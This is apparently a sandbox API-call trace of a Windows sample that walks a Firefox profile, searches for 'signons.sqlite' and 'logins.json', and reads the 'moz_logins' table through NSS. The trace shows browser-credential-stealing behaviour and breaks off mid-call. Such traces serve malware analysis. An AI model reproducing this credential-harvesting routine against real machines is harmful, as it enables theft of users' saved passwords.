[0589.431] LocalAlloc (uFlags=0x40, uBytes=0xa3) returned 0x5d3958 [0589.431] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.431] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.431] IStream:LockRegion (This=0x55e080, libOffset=0xc, cb=0x0, dwLockType=0x0) returned 0x0 [0589.431] IStream:SetSize (This=0x55e080, libNewSize=0x5d3958) returned 0x0 [0589.431] LocalAlloc (uFlags=0x40, uBytes=0xab) returned 0x2ed5118 [0589.431] LocalFree (hMem=0x5d3958) returned 0x0 [0589.431] LocalAlloc (uFlags=0x40, uBytes=0x8a) returned 0x58d8d8 [0589.431] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.432] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.432] IStream:LockRegion (This=0x55e080, libOffset=0x2f, cb=0x0, dwLockType=0x0) returned 0x0 [0589.432] IStream:SetSize (This=0x55e080, libNewSize=0x58d8d8) returned 0x0 [0589.432] LocalAlloc (uFlags=0x40, uBytes=0x92) returned 0x56ff38 [0589.432] LocalFree (hMem=0x58d8d8) returned 0x0 [0589.432] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.432] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.432] IStream:LockRegion (This=0x55e080, libOffset=0x39, cb=0x0, dwLockType=0x0) returned 0x0 [0589.432] IStream:SetSize (This=0x55e080, libNewSize=0x52de87) returned 0x0 [0589.432] LocalAlloc (uFlags=0x40, uBytes=0x8c) returned 0x58d8d8 [0589.432] LocalAlloc (uFlags=0x40, uBytes=0xd3) returned 0x5dbdf0 [0589.432] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.432] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.432] IStream:LockRegion (This=0x55e080, libOffset=0x3a, cb=0x0, dwLockType=0x0) returned 0x0 [0589.432] IStream:SetSize (This=0x55e080, libNewSize=0x5dbdf0) returned 0x0 [0589.432] LocalAlloc (uFlags=0x40, uBytes=0xdb) returned 0x2ed0148 [0589.432] LocalFree (hMem=0x5dbdf0) returned 0x0 [0589.432] LocalFree (hMem=0x56ffd8) returned 0x0 [0589.432] IUnknown:Release (This=0x55e080) returned 0x0 [0589.432] lstrcmpiA (lpString1="moz_logins", lpString2="moz_logins") returned 0 [0589.432] lstrcmpA (lpString1="index", lpString2="table") returned -1 [0589.432] LocalFree (hMem=0x58d840) returned 0x0 [0589.432] LocalFree (hMem=0x2ed5118) returned 0x0 [0589.432] LocalFree (hMem=0x56ff38) returned 0x0 [0589.432] LocalFree (hMem=0x58d8d8) returned 0x0 [0589.432] LocalFree (hMem=0x2ed0148) returned 0x0 [0589.432] LocalFree (hMem=0x570078) returned 0x0 [0589.432] IStream:LockRegion (This=0x598228, libOffset=0x7a76, cb=0x0, dwLockType=0x0) returned 0x0 [0589.432] IStream:LockRegion (This=0x598228, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.432] IStream:LockRegion (This=0x598228, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.432] IStream:LockRegion (This=0x598228, libOffset=0x7a76, cb=0x0, dwLockType=0x0) returned 0x0 [0589.432] IStream:SetSize (This=0x598228, libNewSize=0x52ded3) returned 0x0 [0589.432] IStream:LockRegion (This=0x598228, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.432] IStream:LockRegion (This=0x598228, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.432] IStream:LockRegion (This=0x598228, libOffset=0x7a77, cb=0x0, dwLockType=0x0) returned 0x0 [0589.432] IStream:SetSize (This=0x598228, libNewSize=0x52ded3) returned 0x0 [0589.432] LocalAlloc (uFlags=0x40, uBytes=0x8080) returned 0x2f49758 [0589.432] CreateStreamOnHGlobal (in: hGlobal=0x0, fDeleteOnRelease=1, ppstm=0x52dee8 | out: ppstm=0x52dee8*=0x55e080) returned 0x0 [0589.432] IStream:LockRegion (This=0x598228, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.432] IStream:LockRegion (This=0x598228, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.432] IStream:LockRegion (This=0x598228, libOffset=0x7a78, cb=0x0, dwLockType=0x0) returned 0x0 [0589.432] IStream:SetSize (This=0x598228, libNewSize=0x2f49758) returned 0x0 [0589.432] IStream:Commit (This=0x55e080, grfCommitFlags=0x2f49758) returned 0x0 [0589.432] LocalFree (hMem=0x2f49758) returned 0x0 [0589.432] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.432] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0589.432] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.432] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.432] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0589.432] IStream:SetSize (This=0x55e080, libNewSize=0x52de93) returned 0x0 [0589.432] LocalAlloc (uFlags=0x40, uBytes=0x94) returned 0x570078 [0589.432] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.432] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.432] IStream:LockRegion (This=0x55e080, libOffset=0x1, cb=0x0, dwLockType=0x0) returned 0x0 [0589.432] IStream:SetSize (This=0x55e080, libNewSize=0x52de93) returned 0x0 [0589.433] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.433] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.433] IStream:LockRegion (This=0x55e080, libOffset=0x2, cb=0x0, dwLockType=0x0) returned 0x0 [0589.433] IStream:SetSize (This=0x55e080, libNewSize=0x52de93) returned 0x0 [0589.433] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.433] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.433] IStream:LockRegion (This=0x55e080, libOffset=0x3, cb=0x0, dwLockType=0x0) returned 0x0 [0589.433] IStream:SetSize (This=0x55e080, libNewSize=0x52de93) returned 0x0 [0589.433] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.433] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.433] IStream:LockRegion (This=0x55e080, libOffset=0x4, cb=0x0, dwLockType=0x0) returned 0x0 [0589.433] IStream:SetSize (This=0x55e080, libNewSize=0x52de93) returned 0x0 [0589.433] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.433] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.433] IStream:LockRegion (This=0x55e080, libOffset=0x5, cb=0x0, dwLockType=0x0) returned 0x0 [0589.433] IStream:SetSize (This=0x55e080, libNewSize=0x52de93) returned 0x0 [0589.433] LocalAlloc (uFlags=0x40, uBytes=0x94) returned 0x56ff38 [0589.433] LocalAlloc (uFlags=0x40, uBytes=0x85) returned 0x57c380 [0589.433] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.433] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.433] IStream:LockRegion (This=0x55e080, libOffset=0x6, cb=0x0, dwLockType=0x0) returned 0x0 [0589.433] IStream:SetSize (This=0x55e080, libNewSize=0x57c380) returned 0x0 [0589.433] LocalAlloc (uFlags=0x40, uBytes=0x8d) returned 0x58d8d8 [0589.433] LocalFree (hMem=0x57c380) returned 0x0 [0589.433] LocalAlloc (uFlags=0x40, uBytes=0x95) returned 0x56ffd8 [0589.433] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.433] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.433] IStream:LockRegion (This=0x55e080, libOffset=0xb, cb=0x0, dwLockType=0x0) returned 0x0 [0589.433] IStream:SetSize (This=0x55e080, libNewSize=0x56ffd8) returned 0x0 [0589.433] LocalAlloc (uFlags=0x40, uBytes=0x9d) returned 0x5d1978 [0589.433] LocalFree (hMem=0x56ffd8) returned 0x0 [0589.433] LocalAlloc (uFlags=0x40, uBytes=0x8a) returned 0x58d840 [0589.433] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.433] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.433] IStream:LockRegion (This=0x55e080, libOffset=0x20, cb=0x0, dwLockType=0x0) returned 0x0 [0589.433] IStream:SetSize (This=0x55e080, libNewSize=0x58d840) returned 0x0 [0589.433] LocalAlloc (uFlags=0x40, uBytes=0x92) returned 0x56ffd8 [0589.433] LocalFree (hMem=0x58d840) returned 0x0 [0589.433] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.433] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.433] IStream:LockRegion (This=0x55e080, libOffset=0x2a, cb=0x0, dwLockType=0x0) returned 0x0 [0589.433] IStream:SetSize (This=0x55e080, libNewSize=0x52de87) returned 0x0 [0589.433] LocalAlloc (uFlags=0x40, uBytes=0x8c) returned 0x58d840 [0589.433] LocalAlloc (uFlags=0x40, uBytes=0xb6) returned 0x2ed72a0 [0589.433] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.433] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.433] IStream:LockRegion (This=0x55e080, libOffset=0x2b, cb=0x0, dwLockType=0x0) returned 0x0 [0589.433] IStream:SetSize (This=0x55e080, libNewSize=0x2ed72a0) returned 0x0 [0589.433] LocalAlloc (uFlags=0x40, uBytes=0xbe) returned 0x5b7378 [0589.433] LocalFree (hMem=0x2ed72a0) returned 0x0 [0589.433] LocalFree (hMem=0x570078) returned 0x0 [0589.433] IUnknown:Release (This=0x55e080) returned 0x0 [0589.433] lstrcmpiA (lpString1="moz_logins", lpString2="moz_logins") returned 0 [0589.433] lstrcmpA (lpString1="index", lpString2="table") returned -1 [0589.433] LocalFree (hMem=0x58d8d8) returned 0x0 [0589.433] LocalFree (hMem=0x5d1978) returned 0x0 [0589.433] LocalFree (hMem=0x56ffd8) returned 0x0 [0589.433] LocalFree (hMem=0x58d840) returned 0x0 [0589.433] LocalFree (hMem=0x5b7378) returned 0x0 [0589.433] LocalFree (hMem=0x56ff38) returned 0x0 [0589.433] IStream:LockRegion (This=0x598228, libOffset=0x7a09, cb=0x0, dwLockType=0x0) returned 0x0 [0589.433] IStream:LockRegion (This=0x598228, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.433] IStream:LockRegion (This=0x598228, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.434] IStream:LockRegion (This=0x598228, libOffset=0x7a09, cb=0x0, dwLockType=0x0) returned 0x0 [0589.434] IStream:SetSize (This=0x598228, libNewSize=0x52ded3) returned 0x0 [0589.434] IStream:LockRegion (This=0x598228, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.434] IStream:LockRegion (This=0x598228, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.434] IStream:LockRegion (This=0x598228, libOffset=0x7a0a, cb=0x0, dwLockType=0x0) returned 0x0 [0589.434] IStream:SetSize (This=0x598228, libNewSize=0x52ded3) returned 0x0 [0589.434] LocalAlloc (uFlags=0x40, uBytes=0x8080) returned 0x2f49758 [0589.434] CreateStreamOnHGlobal (in: hGlobal=0x0, fDeleteOnRelease=1, ppstm=0x52dee8 | out: ppstm=0x52dee8*=0x55e080) returned 0x0 [0589.434] IStream:LockRegion (This=0x598228, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.434] IStream:LockRegion (This=0x598228, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.434] IStream:LockRegion (This=0x598228, libOffset=0x7a0b, cb=0x0, dwLockType=0x0) returned 0x0 [0589.434] IStream:SetSize (This=0x598228, libNewSize=0x2f49758) returned 0x0 [0589.434] IStream:Commit (This=0x55e080, grfCommitFlags=0x2f49758) returned 0x0 [0589.434] LocalFree (hMem=0x2f49758) returned 0x0 [0589.434] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.434] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0589.434] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.434] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.434] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0589.434] IStream:SetSize (This=0x55e080, libNewSize=0x52de93) returned 0x0 [0589.434] LocalAlloc (uFlags=0x40, uBytes=0x98) returned 0x56ff38 [0589.434] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.434] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.434] IStream:LockRegion (This=0x55e080, libOffset=0x1, cb=0x0, dwLockType=0x0) returned 0x0 [0589.434] IStream:SetSize (This=0x55e080, libNewSize=0x52de93) returned 0x0 [0589.434] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.434] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.434] IStream:LockRegion (This=0x55e080, libOffset=0x2, cb=0x0, dwLockType=0x0) returned 0x0 [0589.434] IStream:SetSize (This=0x55e080, libNewSize=0x52de93) returned 0x0 [0589.434] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.434] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.434] IStream:LockRegion (This=0x55e080, libOffset=0x3, cb=0x0, dwLockType=0x0) returned 0x0 [0589.434] IStream:SetSize (This=0x55e080, libNewSize=0x52de93) returned 0x0 [0589.434] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.434] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.434] IStream:LockRegion (This=0x55e080, libOffset=0x4, cb=0x0, dwLockType=0x0) returned 0x0 [0589.434] IStream:SetSize (This=0x55e080, libNewSize=0x52de93) returned 0x0 [0589.434] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.434] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.434] IStream:LockRegion (This=0x55e080, libOffset=0x5, cb=0x0, dwLockType=0x0) returned 0x0 [0589.434] IStream:SetSize (This=0x55e080, libNewSize=0x52de93) returned 0x0 [0589.434] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.434] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.434] IStream:LockRegion (This=0x55e080, libOffset=0x6, cb=0x0, dwLockType=0x0) returned 0x0 [0589.434] IStream:SetSize (This=0x55e080, libNewSize=0x52de93) returned 0x0 [0589.434] LocalAlloc (uFlags=0x40, uBytes=0x94) returned 0x56ffd8 [0589.434] LocalAlloc (uFlags=0x40, uBytes=0x85) returned 0x57c380 [0589.434] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.434] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.434] IStream:LockRegion (This=0x55e080, libOffset=0x7, cb=0x0, dwLockType=0x0) returned 0x0 [0589.434] IStream:SetSize (This=0x55e080, libNewSize=0x57c380) returned 0x0 [0589.434] LocalAlloc (uFlags=0x40, uBytes=0x8d) returned 0x58d840 [0589.434] LocalFree (hMem=0x57c380) returned 0x0 [0589.434] LocalAlloc (uFlags=0x40, uBytes=0x98) returned 0x570078 [0589.434] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.434] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.434] IStream:LockRegion (This=0x55e080, libOffset=0xc, cb=0x0, dwLockType=0x0) returned 0x0 [0589.434] IStream:SetSize (This=0x55e080, libNewSize=0x570078) returned 0x0 [0589.434] LocalAlloc (uFlags=0x40, uBytes=0xa0) returned 0x5d1978 [0589.435] LocalFree (hMem=0x570078) returned 0x0 [0589.435] LocalAlloc (uFlags=0x40, uBytes=0x8a) returned 0x58d8d8 [0589.435] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.435] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.435] IStream:LockRegion (This=0x55e080, libOffset=0x24, cb=0x0, dwLockType=0x0) returned 0x0 [0589.435] IStream:SetSize (This=0x55e080, libNewSize=0x58d8d8) returned 0x0 [0589.435] LocalAlloc (uFlags=0x40, uBytes=0x92) returned 0x570078 [0589.435] LocalFree (hMem=0x58d8d8) returned 0x0 [0589.435] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.435] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.435] IStream:LockRegion (This=0x55e080, libOffset=0x2e, cb=0x0, dwLockType=0x0) returned 0x0 [0589.435] IStream:SetSize (This=0x55e080, libNewSize=0x52de87) returned 0x0 [0589.435] LocalAlloc (uFlags=0x40, uBytes=0x8c) returned 0x58d8d8 [0589.435] LocalAlloc (uFlags=0x40, uBytes=0xbc) returned 0x5b7378 [0589.435] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.435] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.435] IStream:LockRegion (This=0x55e080, libOffset=0x2f, cb=0x0, dwLockType=0x0) returned 0x0 [0589.435] IStream:SetSize (This=0x55e080, libNewSize=0x5b7378) returned 0x0 [0589.435] LocalAlloc (uFlags=0x40, uBytes=0xc4) returned 0x58c838 [0589.435] LocalFree (hMem=0x5b7378) returned 0x0 [0589.435] LocalFree (hMem=0x56ff38) returned 0x0 [0589.435] IUnknown:Release (This=0x55e080) returned 0x0 [0589.435] lstrcmpiA (lpString1="moz_logins", lpString2="moz_logins") returned 0 [0589.435] lstrcmpA (lpString1="index", lpString2="table") returned -1 [0589.435] LocalFree (hMem=0x58d840) returned 0x0 [0589.435] LocalFree (hMem=0x5d1978) returned 0x0 [0589.435] LocalFree (hMem=0x570078) returned 0x0 [0589.435] LocalFree (hMem=0x58d8d8) returned 0x0 [0589.435] LocalFree (hMem=0x58c838) returned 0x0 [0589.435] LocalFree (hMem=0x56ffd8) returned 0x0 [0589.435] LocalFree (hMem=0x2f396d0) returned 0x0 [0589.435] IUnknown:Release (This=0x598228) returned 0x0 [0589.438] PK11_FreeSlot () returned 0x372d000 [0589.438] NSS_Shutdown () returned 0x0 [0589.441] StrStrIW (lpFirst="signons.sqlite", lpSrch="logins.json") returned 0x0 [0589.441] LocalFree (hMem=0x5d7c90) returned 0x0 [0589.441] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52dfc0 | out: lpFindFileData=0x52dfc0) returned 1 [0589.441] lstrlenW (lpString="\\") returned 1 [0589.441] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0589.441] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x5d7c90 [0589.441] lstrlenW (lpString="times.json") returned 10 [0589.441] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0589.441] LocalAlloc (uFlags=0x40, uBytes=0x12e) returned 0x5500d0 [0589.441] LocalFree (hMem=0x5d7c90) returned 0x0 [0589.441] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\times.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\times.json"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0589.441] CloseHandle (hObject=0x4c8) returned 1 [0589.441] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\times.json", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x57 [0589.441] LocalAlloc (uFlags=0x40, uBytes=0x12e) returned 0x5d7c90 [0589.441] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\times.json", lpDst=0x5d7c90, nSize=0x57 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\times.json") returned 0x57 [0589.441] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\times.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\times.json"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0589.442] CloseHandle (hObject=0x4c8) returned 1 [0589.442] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\times.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\times.json"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0589.442] GetFileSize (in: hFile=0x4c8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1d [0589.442] CreateFileMappingW (hFile=0x4c8, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x660 [0589.442] MapViewOfFile (hFileMappingObject=0x660, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0589.442] LocalAlloc (uFlags=0x40, uBytes=0x88) returned 0x57c380 [0589.442] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0589.443] CloseHandle (hObject=0x660) returned 1 [0589.443] CloseHandle (hObject=0x4c8) returned 1 [0589.443] LocalFree (hMem=0x5d7c90) returned 0x0 [0589.443] StrStrIW (lpFirst="times.json", lpSrch="signons.sqlite") returned 0x0 [0589.443] StrStrIW (lpFirst="times.json", lpSrch="logins.json") returned 0x0 [0589.443] LocalFree (hMem=0x5500d0) returned 0x0 [0589.443] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52dfc0 | out: lpFindFileData=0x52dfc0) returned 1 [0589.443] lstrlenW (lpString="\\") returned 1 [0589.443] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0589.443] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x5d7c90 [0589.443] lstrlenW (lpString="urlclassifierkey3.txt") returned 21 [0589.443] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0589.443] LocalAlloc (uFlags=0x40, uBytes=0x144) returned 0x5500d0 [0589.443] LocalFree (hMem=0x5d7c90) returned 0x0 [0589.443] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\urlclassifierkey3.txt" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\urlclassifierkey3.txt"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0589.443] CloseHandle (hObject=0x4c8) returned 1 [0589.444] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\urlclassifierkey3.txt", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x62 [0589.444] LocalAlloc (uFlags=0x40, uBytes=0x144) returned 0x578c38 [0589.444] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\urlclassifierkey3.txt", lpDst=0x578c38, nSize=0x62 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\urlclassifierkey3.txt") returned 0x62 [0589.444] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\urlclassifierkey3.txt" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\urlclassifierkey3.txt"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0589.444] CloseHandle (hObject=0x4c8) returned 1 [0589.444] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\urlclassifierkey3.txt" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\urlclassifierkey3.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0589.444] GetFileSize (in: hFile=0x4c8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x9a [0589.444] CreateFileMappingW (hFile=0x4c8, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x660 [0589.444] MapViewOfFile (hFileMappingObject=0x660, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0589.444] LocalAlloc (uFlags=0x40, uBytes=0x88) returned 0x57c410 [0589.444] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0589.445] CloseHandle (hObject=0x660) returned 1 [0589.445] CloseHandle (hObject=0x4c8) returned 1 [0589.445] LocalFree (hMem=0x578c38) returned 0x0 [0589.445] StrStrIW (lpFirst="urlclassifierkey3.txt", lpSrch="signons.sqlite") returned 0x0 [0589.445] StrStrIW (lpFirst="urlclassifierkey3.txt", lpSrch="logins.json") returned 0x0 [0589.445] LocalFree (hMem=0x5500d0) returned 0x0 [0589.445] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52dfc0 | out: lpFindFileData=0x52dfc0) returned 1 [0589.445] lstrcmpiW (lpString1="weave", lpString2=".") returned 1 [0589.445] lstrcmpiW (lpString1="weave", lpString2="..") returned 1 [0589.445] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0589.445] lstrlenW (lpString="\\") returned 1 [0589.445] lstrlenW 